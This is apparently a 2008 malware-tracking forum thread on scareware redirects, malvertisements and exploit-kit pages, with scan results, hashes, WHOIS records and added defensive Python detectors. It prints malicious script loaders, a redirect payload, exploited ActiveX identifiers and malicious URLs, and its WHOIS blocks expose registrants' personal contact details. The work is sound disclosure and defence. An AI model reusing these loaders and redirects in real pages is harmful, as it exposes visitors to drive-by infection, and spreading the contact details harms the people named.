Creation Date: 14-dec-2008
Registrar: BIZCN.COM, INC.

Registrant Contact: Oleg Sobolev tvdomains@lycos.com
+74956541265 fax: +74956541265
ul. St. Razina 67-93
Moskva Moskovskay oblast 113965
ru
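The referrer-dependent behaviour described in the post above (302 only when the Referer carries search keywords, the plain keyword page otherwise) is easy to test for without following any redirect. The example below is added here and is not code from the thread or from the doorway site: `search_keywords` extracts the terms from a search-engine Referer the way the doorway examines the q= field, `doorway_handler` is a constructed model of the behaviour the post describes (not the real server's code), and `detect_referer_cloaking` is the defender's two-fetch comparison. Passing a real HTTP client as `fetch` turns it into a live check; the same comparison applies to the referrer-based redirects from hacked .htaccess files mentioned earlier in the thread. The extra keyword parameter names and the example.test referer are assumptions.

```python
from urllib.parse import urlparse, parse_qs

# Query parameters that carry the search terms; q= is the Google case from the
# post, the other names are assumed for other engines.
KEYWORD_PARAMS = ("q", "p", "query")


def search_keywords(referer):
    """Return the search terms carried by a Referer header, or None when the
    header is missing, malformed, or carries no non-empty keyword parameter."""
    if not referer:
        return None
    parsed = urlparse(referer)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return None
    query = parse_qs(parsed.query)  # drops empty values such as "q="
    for key in KEYWORD_PARAMS:
        values = query.get(key)
        if values and values[0].strip():
            return values[0]
    return None


def doorway_handler(url, headers):
    """Constructed model of the doorway page as the post describes it: a 302 to
    the next hop only when the Referer carries keywords, otherwise the
    keyword-stuffed page with status 200. Returns (status, headers, body)."""
    if search_keywords(headers.get("Referer")):
        return 302, {"Location": "http://onlinecounter2.net/s/in.cgi?[*]"}, b""
    return 200, {"Content-Type": "text/html"}, b"<html>attachment problems yahoo mail ...</html>"


def honest_handler(url, headers):
    """Page that serves the same content regardless of Referer (for comparison)."""
    return 200, {"Content-Type": "text/html"}, b"<html>real help page</html>"


def detect_referer_cloaking(fetch, url, search_referer):
    """Defender's check: request the same URL with no Referer and with a search
    referer, then compare status and Location. fetch(url, headers) must return
    (status, headers, body); a real HTTP client can be passed for live checks."""
    direct = fetch(url, {})
    via_search = fetch(url, {"Referer": search_referer})
    target = via_search[1].get("Location")
    cloaked = direct[0] != via_search[0] or direct[1].get("Location") != target
    return {
        "cloaked": cloaked,
        "direct_status": direct[0],
        "search_status": via_search[0],
        "redirect_target": target,
        "keywords": search_keywords(search_referer),
    }


if __name__ == "__main__":
    ref = ("http://www.google.com/search?hl=en&lr=&as_qdr=w"
           "&q=Attachment+Problems+Yahoo+Mail&start=10&sa=N")
    page = "http://m2areas.com.br/ejcto/nyabt/attachments/attachments.htm"
    print(detect_referer_cloaking(doorway_handler, page, ref))
```

A live client used as `fetch` must not follow redirects itself, otherwise the Location comparison is lost; the point of the check is to record the first hop without visiting it.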
Kimberly
<h4>
YouTube ...
</h4>

A couple of weeks ago a false positive on YouTube video clips freaked out the Internet. Several people got an alert from their antivirus software saying it had detected a virus called Actns/Swif.T.
Being a false positive, panic over, right? Well no … actually you should be very afraid. The video format used by YouTube is Flash.
l.swf - which acts as a container to load the videos - uses the built-in _url variable. This feature makes it possible for the SWF to change its behavior depending on where it is run from. That's why it got flagged by the antivirus software, by the way. Furthermore the ActionScript uses System.security.allowDomain("*").

The uploaded user video files are processed and a Flash file is generated. It’s unlikely that YouTube would host malicious files on purpose, but with the increasing amount of videos being posted all over the web - especially on blogs and social networking sites such as MySpace and Facebook - the real question is: who can you trust?
A quick Google search reveals that thousands of video files are posted every day and I doubt YouTube is actually able to check every file for malicious links before letting them go public. We saw in the past that the bad guys are resourceful when it comes to obfuscating their malicious code, and few tools are able to detect such code.
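Both the movie.swf post (getURL, JavaScript and escaped text decoding to a window.location redirect) and the YouTube post above (_url and System.security.allowDomain("*")) come down to looking inside a SWF for a handful of strings. The following is an added example, not code from the thread or from any tool it mentions: it parses the SWF header (FWS raw, CWS zlib-compressed), checks the declared length, decodes %XX-escaped runs, and reports the suspicious tokens and URLs found. The sample SWFs come from `make_sample_swf`, a constructed container that holds script bytes behind a fixed stand-in preamble; it is not a playable movie and not the file from the post. The token list is an assumption of this example.

```python
import re
import struct
import zlib
from urllib.parse import unquote

# Tokens worth flagging in an ad or player SWF (assumed list). _url and
# allowDomain are the features discussed in the YouTube post; getURL,
# javascript:, unescape and eval are the movie.swf pattern.
SUSPICIOUS = ["getURL", "allowDomain", "_url", "javascript:", "unescape", "eval("]


def swf_body(data):
    """Parse the 8-byte SWF header and return (version, declared_length, body).
    FWS bodies are stored raw, CWS bodies are zlib-compressed; the declared
    length counts the uncompressed file including its header."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    sig, version = data[:3], data[3]
    declared = struct.unpack("<I", data[4:8])[0]
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        body = zlib.decompress(data[8:])
    elif sig == b"ZWS":
        raise ValueError("LZMA-compressed SWF not handled in this example")
    else:
        raise ValueError("not a SWF signature")
    return version, declared, body


def decode_escaped_strings(body):
    """Find runs of at least four %XX escapes (the 'Escaped text' trick) and decode them."""
    return [unquote(m.group().decode("ascii"))
            for m in re.finditer(rb"(?:%[0-9A-Fa-f]{2}){4,}", body)]


def scan_swf(data):
    """Header sanity check plus token and URL extraction over the raw body and
    over the decoded escaped strings."""
    version, declared, body = swf_body(data)
    decoded = decode_escaped_strings(body)
    text = body.decode("latin-1") + "\n" + "\n".join(decoded)
    return {
        "version": version,
        "declared_length": declared,
        "length_ok": declared == 8 + len(body),
        "indicators": sorted(tok for tok in SUSPICIOUS if tok in text),
        "decoded": decoded,
        "urls": sorted(set(re.findall(r"(?:https?:)?//[\w.\-]+/[\w.\-/?=&%]*", text))),
    }


def percent_escape(s):
    """Escape every byte as %XX, the form in which the obfuscated payload was stored."""
    return "".join("%%%02X" % b for b in s.encode())


def make_sample_swf(script, version=8, compress=True):
    """Constructed test input: a fixed preamble (stand-in for RECT, frame rate
    and frame count) followed by the script bytes. Not a playable movie."""
    preamble = b"\x50\x00\x0f\xa0\x00\x00\x0f\xa0\x00\x18\x01\x00"
    body = preamble + script + b"\x00\x00"
    payload = zlib.compress(body) if compress else body
    return (b"CWS" if compress else b"FWS") + bytes([version]) \
        + struct.pack("<I", 8 + len(body)) + payload


if __name__ == "__main__":
    # Same decoded redirect as the movie.swf post, re-escaped for the sample.
    payload = percent_escape('window.location = "//m08b.com/in.cgi?default";')
    sample = make_sample_swf(("getURL(\"javascript:eval(unescape('%s'))\");" % payload).encode())
    print(scan_swf(sample))
```

A declared length that does not match the decompressed size is worth a second look on its own, and a ZWS (LZMA) signature, which this example refuses, needs the `lzma` module and a slightly different header layout before the same scan can run.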
Kimberly
<h4>
00119922.com - Search engine flood or how to take advantage of SEO
</h4>
In the past months we saw different tricks to get those fake scanners aka scareware on your computer. A couple of days ago we detailed an example where the search engine was exploited to redirect people to those same fake online scanners and trick them into the install of Antivirus 360 / 2009 using popular expressions - Reference.
This time an unknown hacker went a step further and performed some SEO (Search Engine Optimization) to flood search engines, using a unique domain: 00119922.com

Full Story: More than 1 Million Ways to Infect Your Computer

Any link containing microsoft.com will be handled by MS servers and redirect the user to Live Search.
Other links will trigger a full redirect to the scan engine.

Redirects.
00119922.com/in.php?&n=[*]&t=[keywords]
hitstransfer.com/in.php?land=[*]&affid=[*]
netsecuritybureau.com/scan/index.php?affid=[*]
netsecuritybureau.com/downloadsetupws.php?affid=[*]
<h4>
IP details
</h4>

00119922.com - 87.248.163.58

Updated Date: 19-dec-2008
Creation Date: 19-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS3.MY2NS.NET - NS4.MY2NS.NET
Registrant: PrivacyProtect.org
______________________________

hitstransfer.com - 91.211.64.31

Updated Date: 20-dec-2008
Creation Date: 20-dec-2008
Registrar: REGTIME LTD
Name Server: NS1.HITSTRANSFER.COM - NS2.HITSTRANSFER.COM

Registrant: Robert Ward
Email: robertmwards@gmail.com
Organization: Private person
Address: 1595 Stoney Lane
City: Carrollton
State: TX
ZIP: 75006
Country: US
Phone: +1.9729044211
______________________________

netsecuritybureau.com - 91.211.64.31

Updated Date: 20-dec-2008
Creation Date: 20-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.NETSECURITYBUREAU.COM - NS2.NETSECURITYBUREAU.COM

Registrant: Robert Ward
Email: robertmwards@gmail.com
Organization: Private person
Address: 1595 Stoney Lane
City: Carrollton
State: TX
ZIP: 75006
Country: US
Phone: +1.9729044211
______________________________

Why am I not surprised at all when the names Directi, REGTIME LTD and PrivacyProtect pop up as usual?

<h4>
install.exe - ws.zip
</h4>
install.exe

File install.exe received on 12.24.2008 00:37:00
AhnLab-V3 2008.12.22.0 2008.12.23 -
AntiVir 7.9.0.45 2008.12.23 -
Authentium 5.1.0.4 2008.12.23 -
Avast 4.8.1281.0 2008.12.23 -
AVG 8.0.0.199 2008.12.23 -
BitDefender 7.2 2008.12.24 -
CAT-QuickHeal 10.00 2008.12.23 -
ClamAV 0.94.1 2008.12.23 -
Comodo 804 2008.12.23 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.23 Suspicious File
eTrust-Vet 31.6.6275 2008.12.23 -
Ewido 4.0 2008.12.23 -
F-Prot 4.4.4.56 2008.12.23 -
F-Secure 8.0.14332.0 2008.12.24 -
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 -
Ikarus T3.1.1.45.0 2008.12.23 Trojan-Downloader.Win32.Delf
K7AntiVirus 7.10.563 2008.12.23 -
Kaspersky 7.0.0.125 2008.12.23 -
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 Generic!Artemis
Microsoft 1.4205 2008.12.24 -
NOD32 3714 2008.12.23 -
Norman 5.80.02 2008.12.23 -
Panda 9.0.0.4 2008.12.23 Suspicious file
PCTools 4.4.2.0 2008.12.23 -
Prevx1 V2 2008.12.24 Malicious Software
Rising 21.09.14.00 2008.12.23 -
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.23 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.23 PAK_Generic.001
VBA32 3.12.8.10 2008.12.23 -
ViRobot 2008.12.23.1532 2008.12.23 -
VirusBuster 4.5.11.0 2008.12.23 -

Additional information
File size: 62505 bytes
MD5...: 2bd950fdb5770ce6a1567f162dfa2679
SHA1..: a9fdc0544605c94f1ea6040935e0ef0811eade32
SHA256: 30b669b1cfb140c58ad5fce6a75a47322bbf6f8505bf74dff29e4d49dd0ca771
Installer needs to download additional components.
IPB Image

IPB Image

IPB Image

ws.zip

File ws.zip received on 12.24.2008 00:49:33 (CET)
AhnLab-V3 2008.12.22.0 2008.12.24 -
AntiVir 7.9.0.45 2008.12.23 -
Authentium 5.1.0.4 2008.12.23 -
Avast 4.8.1281.0 2008.12.23 -
AVG 8.0.0.199 2008.12.23 -
BitDefender 7.2 2008.12.24 -
CAT-QuickHeal 10.00 2008.12.23 -
ClamAV 0.94.1 2008.12.23 -
Comodo 804 2008.12.23 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.23 -
eTrust-Vet 31.6.6275 2008.12.23 -
Ewido 4.0 2008.12.23 -
F-Prot 4.4.4.56 2008.12.23 -
F-Secure 8.0.14332.0 2008.12.24 -
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 -
Ikarus T3.1.1.45.0 2008.12.23 -
K7AntiVirus 7.10.563 2008.12.23 -
Kaspersky 7.0.0.125 2008.12.24 Trojan.Win32.Agent.azgp
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 -
Microsoft 1.4205 2008.12.24 -
NOD32 3714 2008.12.23 Win32/Adware.WinWebSecurity
Norman 5.80.02 2008.12.23 -
Panda 9.0.0.4 2008.12.23 -
PCTools 4.4.2.0 2008.12.23 -
Prevx1 V2 2008.12.24 -
Rising 21.09.14.00 2008.12.23 -
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.24 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.23 -
VBA32 3.12.8.10 2008.12.23 -
ViRobot 2008.12.23.1532 2008.12.23 -
VirusBuster 4.5.11.0 2008.12.23 -

Additional information
File size: 896784 bytes
MD5...: ba42c570adc9d23461dd9f1110679440
SHA1..: 458b41185c078b935c96615236f025d4914830f6
SHA256: 2c3f6a05ba850e831feb9c5d61d6944c8661fb128f0e903552aad992fcadeaf9
Kimberly
<h4>
ashoping.com
</h4>
winSexZGcy3vILV.exe

File size: 62464 bytes
MD5...: 52d361374317c32b55958f9ba78b506b
SHA1..: 2fcbc381e432ea2eae4ea3c42097d0f75a76aa13
SHA256: 6ed542eceb4ccecb398098b3a4e983f9d4f858f3cac8778d8805240e2d3800a4
QUOTE
File winSexZGcy3vILV.exe received on 12.24.2008 07:06:33
AhnLab-V3 2008.12.22.0 2008.12.24 -
AntiVir 7.9.0.45 2008.12.23 -
Authentium 5.1.0.4 2008.12.24 -
Avast 4.8.1281.0 2008.12.23 -
AVG 8.0.0.199 2008.12.23 -
BitDefender 7.2 2008.12.24 -
CAT-QuickHeal 10.00 2008.12.24 (Suspicious) - DNAScan
ClamAV 0.94.1 2008.12.23 -
Comodo 804 2008.12.23 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.23 Suspicious File
eTrust-Vet 31.6.6276 2008.12.24 -
Ewido 4.0 2008.12.23 -
F-Prot 4.4.4.56 2008.12.24 -
F-Secure 8.0.14332.0 2008.12.24 Suspicious:W32/Malware!Gemini
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 -
Ikarus T3.1.1.45.0 2008.12.24 -
K7AntiVirus 7.10.563 2008.12.23 -
Kaspersky 7.0.0.125 2008.12.24 -
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 -
Microsoft 1.4205 2008.12.24 -
NOD32 3715 2008.12.24 -
Norman 5.80.02 2008.12.23 -
Panda 9.0.0.4 2008.12.23 -
PCTools 4.4.2.0 2008.12.23 -
Prevx1 V2 2008.12.24 Fraudulent Security Program
Rising 21.09.14.00 2008.12.23 -
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.24 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.24 -
VBA32 3.12.8.10 2008.12.23 -
ViRobot 2008.12.24.1533 2008.12.24 -
VirusBuster 4.5.11.0 2008.12.23 -
Family: Vundo - ThreatExport Report.
______________________________

We ran into ashoping.com & friends before but now they are coming through Right Media / Yahoo and thus a higher amount of users will be affected. From adspot200.com we are redirected to ad.yieldmanager.com where a script will lead us to the advertiser. Pink entries are the redirects we will experience.
IPB Image
The page at banners.exitexchange.com reveals 3 elements.
IPB Image
  1. hits.revenuestreet.com - clicktag
  2. ban.revenuestreet.com - banner to be displayed
    IPB Image

  3. iframe to count.exit1208.com
At count.exit1208.com we are redirected to ashoping.com which contains an iframe at the bottom of the page leading us to the infamous 85.12.43.126. The sid appended to the URL is a session ID which is only valid for a short period of time.
IPB Image
85.12.43.126 contains a highly obfuscated JavaScript.
IPB Image
Once decoded we discover several exploits:
  1. MDAC: Arbitrary file download via the Microsoft Data Access Components (MDAC)
  2. Windows Media Encoder: Windows Media Encoder buffer overflow
  3. Yahoo! Webcam Uploader: Yahoo! Webcam Uploader buffer overflow via long 'server' property followed by an invocation of the 'receive' method
  4. Aurigma Photo Uploader: Aurigma Photo Uploader overflow in the ExtractIpct and ExtractExif properties
  5. ActiveVoice: ActiveVoice buffer overflow via ModeName parameter in the FindEngine function
  6. Yahoo! Webcam Viewer: Yahoo! Webcam Viewer buffer overflow via long server property followed by an invocation of the send method
  7. iMesh IMWebControl: iMesh IMWebControl overflow via the SetHandler method
  8. Ask Toolbar: Ask Toolbar stack-based overflow via the ShortFormat property
  9. WebViewFolder: WebViewFolder integer overflow via the setSlice method
  10. iMesh IMWebControl DoS: iMesh IMWebControl denial of service via empty ProcessRequestEx method
All will try to get style.exe - renamed to winSexZGcy3vILV.exe - from 78.26.179.61 on your computer. In addition to those listed above, we also notice the presence of a PDF exploit - 85.12.43.126/css/pdf.php?id=0&sid=[*]. Shellcode will lead to the same executable.

count.exit1208.com acts as a rotator; you might encounter other redirects from there. All will lead to websites containing infections & executables. Example:
litefly.net/exit/promo/
litefly.net/exit.php
litefly.net/popup/pop1_2007-09-04.htm
litefly.net/popup/pre_2007-09-04.htm
litefly.net/popup/pop2_2007-09-04.htm
litefly.net/unpack/index.php
litefly.net/unpack/load.php


winmBZzr.exe

File size: 41984 bytes
MD5...: c54cf6752d014d1c68d82f300fc8194c
SHA1..: ad0c13814ad26dab06c63ab6b7cf18ef78b672ee
QUOTE
CAT-QuickHeal 10.00 2008.12.24 (Suspicious) - DNAScan
Microsoft 1.4205 2008.12.24 Trojan:Win32/Hiloti.gen!A
<h4>
IP details
</h4>
banners.exitexchange.com - 64.146.132.39

Updated Date: 10-nov-2008
Name Server: NS15.DOMAINCONTROL.COM - NS16.DOMAINCONTROL.COM
Registrant: Modena Incorporated
______________________________

hits.revenuestreet.com - 67.201.62.189 & ban.revenuestreet.com - 67.201.36.8

Domain name: revenuestreet.com
Updated Date: 07-jul-2008
Name Server: DNS1.NAME-SERVICES.COM - DNS2.NAME-SERVICES.COM - DNS3.NAME-SERVICES.COM - DNS4.NAME-SERVICES.COM - DNS5.NAME-SERVICES.COM

Registrant Contact: stellar
Ben Jamin (nick@themediacrew.com)
+1.4076510288
Fax: +1.4072729211
7512 Dr. Phillips Blvd
# 50 Suite 168
Orlando, FL 32819
US
______________________________

count.exit1208.com - 64.146.132.39

Updated Date: 11-dec-2008
Creation Date: 11-dec-2008
Name Server: NS61.DOMAINCONTROL.COM - NS62.DOMAINCONTROL.COM
Registrar: GODADDY.COM, INC

Registrant: Hunter, Bryan bryan@modenainc.com
921 SW Washington St
Suite 228
Portland, Oregon 97205
United States
(503) 241-1091
______________________________

ashoping.com - 85.12.43.124

Updated Date: 13-oct-2008
Creation Date: 13-oct-2008
Name Server: NS1.ASHOPING.COM - NS2.ASHOPING.COM - NS3.ASHOPING.COM - NS4.ASHOPING.COM
Registrar: MONIKER ONLINE SERVICES, INC

Registrant [1516145]: Helen Nikolson helen.nikolson@gmail.com
PO Box 441
Road town
null
0000
VG

domains sharing nameservers: automobilewdew.com | bigmp3online.com | buynow21.com | detoxitnow.com | financestoc.com | greatlakemusic.com | mp3cdt.com | travelcardclub.com
______________________________

85.12.43.126 - 85.12.43.126.xentronix.nl

IP Location: Netherlands Xentronix
inetnum: 85.12.43.0 - 85.12.43.255
netname: NL-XENTRONIX
descr: Xentronix
______________________________

78.26.179.61

IP Location: Ukraine Odessa Renome-service: Joint Multimedia Cable Network
inetnum: 78.26.161.0 - 78.26.191.255
netname: RENOME-SERVICE
descr: Renome-Service: Joint Multimedia Cable Network
______________________________

litefly.net - 66.232.97.163

Updated Date: 04-dec-2008
Creation Date: 04-dec-2008
Name Server: NS1.NAMESELF.COM - NS2.NAMESELF.COM
Registrar: REGTIME LTD.

Registrant: Dmitrij Belov
Email: joker500@mail.ru
Organization: Private person
Address: ul. Pushkina d.12-12
City: Moskva
State: Moskovskaya
ZIP: 127000
Country: RU
Phone: +7.9050294354
Kimberly
<h4>
clicksadssystems.com - secured-live-scan.com - updatedownloadlists.com - protecton-antivirus-scan.com
</h4>
Redirects
clicksadssystems.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
secured-live-scan.com/2009/1/en/freescan.php?id=[*]

updatedownloadlists.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
protecton-antivirus-scan.com/2009/1/en/freescan.php?id=[*]
clicksadssystems.com - 78.46.205.65

IP Location - Germany - Siarhei Shandrokha
Updated Date: 21-dec-2008
Creation Date: 21-dec-2008
Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Registrar: BIZCN.COM, INC.

secured-live-scan.com - 78.46.205.69

IP Location - Germany - Siarhei Shandrokha
Updated Date: 22-dec-2008
Creation Date: 22-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

updatedownloadlists.com - 78.46.216.238

IP Location - Germany - Siarhei Shandrokha
Updated Date: 21-dec-2008
Creation Date: 21-dec-2008
Name Server: NS1.MANAGEHOSTDNS.COM - NS2.MANAGEHOSTDNS.COM - NS3.MANAGEHOSTDNS.COM
Registrar: BIZCN.COM, INC.

protecton-antivirus-scan.com - 78.46.216.237

IP Location - Germany - Siarhei Shandrokha
Updated Date: 22-dec-2008
Creation Date: 21-dec-2008
Name Server: NS1.FASTFREETEST.CN - NS2.FASTFREETEST.CN - NS3.FASTFREETEST.CN
Registrar: BIZCN.COM, INC.

91.211.64.47

ns1.fastfreetest.cn
ns1.freehostns.com
ns1.managehostdns.com

78.46.205.70

ns2.fastfreetest.cn
ns2.freehostns.com
ns2.managehostdns.com

64.86.17.44

ns2.freefastdns.com
ns3.fastfreetest.cn
ns3.freehostns.com
ns3.freeyourdns.com
ns3.managehostdns.com
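Added example, not tooling from this thread: the soft.php / freescan.php / downloadsetupws.php URL shapes recur in every redirect chain posted here, so they make a usable proxy-log signature. The Python below classifies each request into a chain stage and then groups by client so the analyst sees who reached the fake scanner or the installer. The log layout and the log lines are constructed for the example (the domains are the ones quoted in the thread; the aid/id values are made up).

```python
"""Flag the scareware redirect chain in web-proxy logs. Signatures are built
from the URL shapes quoted in this thread; the log lines are constructed for
the example (the domains are the thread's, the aid/id values are made up).
Added example, not tooling from the forum."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# (stage, path pattern, query keys that must be present)
SIGNATURES = [
    ("affiliate-gate", re.compile(r"/soft\.php$"), {"aid", "product"}),
    ("affiliate-gate", re.compile(r"/in\.php$"), {"affid"}),
    ("fake-scanner", re.compile(r"/\d{4}/\d+/(en/)?freescan\.php$"), set()),
    ("fake-scanner", re.compile(r"/scan/index\.php$"), {"affid"}),
    ("fake-scanner", re.compile(r"/scan\.php$"), {"campaign"}),
    ("installer", re.compile(r"/downloadsetupws\.php$"), {"affid"}),
]

# Assumed log layout: "<timestamp> <client-ip> <method> <url>" (one request per line).
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")

# Constructed sample log: one client walks the whole chain, one does not.
SAMPLE_LOG = """\
2008-12-24T00:37:00 10.0.0.5 GET http://www.example-news.test/index.html
2008-12-24T00:37:01 10.0.0.5 GET http://clicksadssystems.com/soft.php?aid=1234&d=1&product=XPA&refer=example
2008-12-24T00:37:02 10.0.0.5 GET http://secured-live-scan.com/2009/1/en/freescan.php?id=1234
2008-12-24T00:37:09 10.0.0.5 GET http://netsecuritybureau.com/downloadsetupws.php?affid=77
2008-12-24T00:38:00 10.0.0.9 GET http://search.example.test/results?q=soft.php
"""


def classify_url(url: str) -> Optional[str]:
    """Return the chain stage a URL belongs to, or None if nothing matches."""
    parts = urlsplit(url)
    keys = set(parse_qs(parts.query, keep_blank_values=True))
    for stage, path_re, required in SIGNATURES:
        if path_re.search(parts.path) and required <= keys:
            return stage
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Every request that matches a signature, in log order."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stage = classify_url(m["url"])
        if stage:
            hits.append({"ts": m["ts"], "client": m["client"],
                         "host": urlsplit(m["url"]).hostname or "", "stage": stage})
    return hits


def clients_reaching(hits: List[Dict[str, str]], stage: str = "fake-scanner") -> Dict[str, List[str]]:
    """Per client, the ordered stages seen; only clients that got as far as `stage`.
    A client with 'installer' in its list fetched the setup program and needs
    host triage, not just a block on the domains."""
    seen: Dict[str, List[str]] = {}
    for h in hits:
        seen.setdefault(h["client"], []).append(h["stage"])
    return {c: s for c, s in seen.items() if stage in s}


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
    print(clients_reaching(scan_log(SAMPLE_LOG), "installer"))
```

The path patterns are deliberately generic (scan.php?campaign= can occur on legitimate sites), so treat a lone hit as a lead and a full gate-scanner-installer sequence from one client as an incident. Add the freshly registered domains from each post to a blocklist alongside this, since the URL shape outlives any single domain.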
Kimberly
<h4>
WARNING: The New Republic - Sell Your Home
</h4>
Another malvertizement featuring Sell Your Home aka International Listings - www.intlistings.com - distributed by adserver.adtechde.net is being displayed at The New Republic - www.tnr.com.

Screenshot in situ.
IPB Image
Banner.
adserver.adtechde.net/adiframe|3.0|124|67983745|4|1|ADTECH;loc=700;grp=tnr/tnr_intllist160x600.swf
IPB Image IPB Image
Campaign.
adclickmate.net/_stat.gif?src=[*]
The malvertizement has been acquired by DoubleClick. Both had already hit the news on Dec 14 2008 - WARNING: www.startribune.com - ETRADE. DoubleClick should have terminated all transactions and banners from adserver.adtechde.net at that time; not checking their contracts and leaving those malicious banners live is simply irresponsible of them.
FYI, the same day I blogged about the presence of a malicious banner featuring Sell Your Home at adserver.adtechde.net.
Kimberly
<h4>
securedliveclicks.com - antivirusdefencescanner.com - securedprotectedclicks.com - liveantiviruspccheck.com
</h4>
More Antivirus 2009 - 360 Redirects
securedliveclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
antivirusdefencescanner.com/2009/1/en/freescan.php?id=[*]

securedprotectedclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
liveantiviruspccheck.com/2009/1/en/freescan.php?id=[*]
securedliveclicks.com - 88.198.0.143

Updated Date: 22-dec-2008
Creation Date: 22-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

antivirusdefencescanner.com - 88.198.0.143

Updated Date: 26-dec-2008
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

securedprotectedclicks.com - 78.46.101.234

Updated Date: 22-dec-2008
Creation Date: 22-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com

liveantiviruspccheck.com - 84.16.224.115 / 64.20.38.91 / 69.10.49.193 / 78.47.248.118 / 78.159.118.144

Updated Date: 26-dec-2008
Creation Date: 23-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Registrant: Andrey V Vernikov - promasteryouth@gmail.com
Kimberly
<h4>
WARNING : MySpace - prolinar.com
</h4>
The actors. Screenshot in situ.

As seen on the screenshot, we got our "gift" while connecting to MySpace Chat. This time the bad guys went a step ahead and a little "bonus" has been added to the usual redirect to Antivirus 2009 / 360.
IPB Image
<h4>
Traces & Analysis
</h4>
Advertising request handled by userplane.com with the redirect leading to www.prolinar.com
IPB Image
We discover several elements on the webpage at www.prolinar.com
IPB Image

Only the bold elements are of any interest and will be detailed below.
  1. Click target: www.perfectmatch.com/?cp=72id
  2. Banner: www.prolinar.com/banners-db/-MISC Dating/PerfectMatch.com_728x90.jpg

    IPB Image

  3. IFrame: test.3tmp3.com/fie/index.php
  4. action_URL = media-drive.com/system-info.html
  5. Escaped text

    CODE
    document.write(unescape("%3Cscript src='http://" + cur_domain + "/includes02a.js' type='text/javascript'%3E%3C/script%3E"));
<h4>
media-drive.com/system-info.html
</h4>
Nothing outstanding here ... the usual redirects. The escaped text points to includes02a.js as above; which doesn't contain anything special.
IPB Image

CODE
if (top.location!= self.location) {
        top.location = action_URL;
    } else {
        window.location = action_URL;
    }

Redirects.
securedliveclicks.com/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
advanced-antivirus-scanner.com/2009/1/freescan.php?nu=[*]
advanced-antivirus-scanner.com/2009/1/en/freescan.php?id=[*]
<h4>
test.3tmp3.com/fie/index.php
</h4>
With this page, we jump to a higher level ... the script "living" there is what triggered the ProcessGuard alert in the screenshot.
IPB Image
You will have to resist several exploit attempts or get screwed in case you fail.
  1. mdac (MS06-014)
    • BD96C556-65A3-11D0-983A-00C04FC29E36
    • BD96C556-65A3-11D0-983A-00C04FC29E30
    • AB9BCEDD-EC7E-47E1-9322-D4A210617116
    • 0006F033-0000-0000-C000-000000000046
    • 0006F03A-0000-0000-C000-000000000046
    • 6e32070a-766d-4ee6-879c-dc1fa91d2fc3
    • 6414512B-B978-451D-A0D8-FCFDF33E833C
    • 7F5B7F63-F06F-4331-8A26-339E03C0AE3D
    • 06723E09-F4C2-43c8-8358-09FCD1DB0766
    • 639F725F-1B2D-4831-A9FD-874847682010
    • BA018599-1DB3-44f9-83B4-461454C84BF8
    • D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
    • E8CCCDDF-CA28-496b-B050-6C07C962476B
  2. WebViewFolder setSlice - WebViewFolderIcon.WebViewFolderIcon.1
